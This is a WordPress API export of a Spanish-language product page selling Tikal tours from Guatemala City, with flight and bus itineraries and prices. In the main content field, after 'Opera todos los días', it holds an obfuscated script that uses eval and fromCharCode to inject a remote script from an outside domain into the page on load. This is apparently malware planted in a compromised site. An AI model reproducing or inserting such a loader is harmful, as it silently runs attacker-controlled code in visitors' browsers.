{"id":441,"date":"2022-12-03T17:08:47","date_gmt":"2022-12-03T23:08:47","guid":{"rendered":"https:\/\/gtmtourguide.com\/?post_type=product&#038;p=441"},"modified":"2025-08-30T18:58:04","modified_gmt":"2025-08-31T00:58:04","slug":"tikal-guatemala","status":"publish","type":"product","link":"https:\/\/gtmtourguide.com\/index.php\/product\/tikal-guatemala\/","title":{"rendered":"TIKAL GUATEMALA"},"content":{"rendered":"<p><button class=\"wtrvl-checkout_button\" id=\"wetravel_button_widget\" data-env=\"https:\/\/www.wetravel.com\" data-version=\"v0.3\" data-uid=\"612513\" data-uuid=\"33461300\" href=\"https:\/\/www.wetravel.com\/checkout_embed?uuid=33461300\" style=\"background-color: #f5a623; color: #ffffff; border: 0px; border-radius: 5px; font-family: 'Poppins', sans-serif; font-weight: 400; font-size: 14px; -webkit-font-smoothing: antialiased; text-transform: capitalize; padding: 13px 24px; text-decoration: none; text-align: center; line-height: 14px; display: inline-block; cursor: pointer;\">Book Now<\/button> <script src=\"https:\/\/cdn.wetravel.com\/widgets\/embed_checkout.js\"><\/script><\/p>\n<p><span style=\"color: #ff6600;\"><strong>Opera todos los d\u00edas.<\/strong><\/span><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><button class=\"wtrvl-checkout_button\" id=\"wetravel_button_widget\" data-env=\"https:\/\/www.wetravel.com\" data-version=\"v0.3\" data-uid=\"612513\" data-uuid=\"33461300\" href=\"https:\/\/www.wetravel.com\/checkout_embed?uuid=33461300\" style=\"background-color: #f5a623; color: #ffffff; border: 0px; border-radius: 5px; font-family: 'Poppins', sans-serif; font-weight: 400; font-size: 14px; -webkit-font-smoothing: antialiased; text-transform: capitalize; padding: 13px 24px; text-decoration: none; text-align: center; line-height: 14px; display: inline-block; cursor: pointer;\">Book Now<\/button> <script src=\"https:\/\/cdn.wetravel.com\/widgets\/embed_checkout.js\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Antes de realizar tu pago, aseg\u00farate de confirmar la disponibilidad en fechas de vuelo.<\/strong><\/p>\n<p><span style=\"color: #ff6600;\"><strong>*Opera todos los d\u00edas<\/strong><\/span><\/p>\n<p><span style=\"font-weight: 400;\">Un tour \u00fanico que lo har\u00e1 regresar en el tiempo a conocer una de las civilizaciones m\u00e1s grandes del mundo.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">En tan solo una hora ya estar\u00e1s en Flores Pet\u00e9n, donde se te esperar\u00e1 para llevarte al sitio arqueol\u00f3gico de Tikal, y regresando a Ciudad de Guatemala por la noche.<\/span><\/p>\n<p><strong>Por Avi\u00f3n\u00a0<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">Recogemos en su hotel a las 4:00 a.m. y le llevamos al aeropuerto, para abordar su vuelo con rumbo a Isla Flores.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A su llegada ser\u00e1n recibidos en el aeropuerto por parte de nuestro equipo, para llevarla hasta el sitio arqueol\u00f3gico de Tikal. Descubre decenas de patios, palacios, plazas y templos mientras caminas alrededor de las antiguas construcciones que mantienen muy bien conservadas los expertos.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Algunos se levantan de manera imponente y se ven a trav\u00e9s de las copas de los \u00e1rboles, mientras que otros se ocultan detr\u00e1s del tupido follaje.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Imagina el tiempo en que Tikal sirvi\u00f3 como centro de la actividad econ\u00f3mica, militar y pol\u00edtica.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sorpr\u00e9ndete con el talento art\u00edstico que hab\u00eda en esa civilizaci\u00f3n milenaria.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Incluye:<\/strong><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Traslado hotel &#8211; aeropuerto &#8211; hotel<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Boleto a\u00e9reo v\u00eda TAG.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Tour a Tikal con gu\u00eda biling\u00fce<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Almuerzo en Tikal.<\/span><\/li>\n<\/ul>\n<p><strong>Precio: 420 USD <\/strong><br \/>\n<span style=\"font-weight: 400;\">por persona\u00a0<\/span><\/p>\n<p>Tambi\u00e9n tenemos la opci\u00f3n de viajar por Bus, desde Ciudad de Guatemala.<\/p>\n<p><strong>En autob\u00fas:<\/strong><br \/>\nLa salida del autob\u00fas puede variar entre las 19:00 y las 21:00 en funci\u00f3n de la disponibilidad.<\/p>\n<p>D\u00eda 1: Viajar\u00e1 durante la noche por la carretera que lleva al Atl\u00e1ntico.<\/p>\n<p>D\u00eda 2: A su llegada a Santa Elena, nuestro equipo de trabajo lo estar\u00e1 esperando para llevarlo a desayunar (no incluido) y reunirse con el resto del grupo, para realizar su tour a Tikal. Por la tarde regresar\u00e1n a Isla Flores para caminar y prepararse para abordar el autob\u00fas, con destino a Ciudad de Guatemala.<\/p>\n<p>D\u00eda 3: Llegada a Ciudad de Guatemala y traslado a su hotel.<\/p>\n<p><strong>Precio por persona:<\/strong> <strong>USD225<\/strong><\/p>\n","protected":false},"featured_media":474,"comment_status":"open","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false},"product_brand":[],"product_cat":[18],"product_tag":[],"class_list":{"0":"post-441","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-viajes-de-un-dia","8":"first","9":"onbackorder","10":"shipping-taxable","11":"product-type-simple"},"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product\/441","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/comments?post=441"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/media\/474"}],"wp:attachment":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/media?parent=441"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_brand?post=441"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=441"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}